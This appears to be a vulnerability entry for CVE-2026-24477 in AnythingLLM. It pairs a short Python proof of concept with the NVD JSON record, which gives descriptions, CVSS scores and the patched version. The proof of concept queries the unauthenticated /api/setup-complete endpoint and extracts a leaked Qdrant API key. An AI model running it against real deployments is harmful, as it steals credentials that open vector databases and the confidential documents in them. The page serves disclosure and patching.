CVE-2026-24477

import requests import json # CVE-2026-24477 PoC - AnythingLLM QdrantApiKey Leakage # Target: AnythingLLM < 1.10.0 with Qdrant vector database configured target_url = "http://target:3001/api/setup-complete" try: response = requests.get(target_url, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {json.dumps(data, indent=2)}") # Check for QdrantApiKey in response if 'qdrantApiKey' in str(data): print("\n[!] VULNERABLE: QdrantApiKey exposed in response!") # Extract the key if present if isinstance(data, dict): for key, value in data.items(): if 'qdrant' in str(key).lower() and 'key' in str(key).lower(): print(f"[+] Found: {key} = {value}") else: print("[-] QdrantApiKey not found in response (possibly patched)") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}")

{"cve": {"id": "CVE-2026-24477", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:51.150", "lastModified": "2026-01-28T15:59:06.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue."}, {"lang": "es", "value": "AnythingLLM es una aplicación que convierte fragmentos de contenido en contexto que cualquier LLM puede usar como referencias durante el chat. Si AnythingLLM anterior a la versión 1.10.0 está configurado para usar Qdrant como la base de datos vectorial con una clave API, esta QdrantApiKey podría quedar expuesta en texto plano a usuarios no autenticados a través del endpoint `/api/setup-complete`. La fuga de QdrantApiKey permite a un atacante no autenticado acceso completo de lectura/escritura a la instancia de la base de datos vectorial Qdrant utilizada por AnythingLLM. Dado que Qdrant a menudo almacena la base de conocimiento central para RAG en AnythingLLM, esto puede llevar a un compromiso completo de la funcionalidad de búsqueda semántica / recuperación y a la fuga indirecta de documentos confidenciales cargados. La versión 1.10.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.0", "matchCriteriaId": "8DEA04F2-1EE6-4943-B989-76CB56A33BC2"}]}]}], "references": [{"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}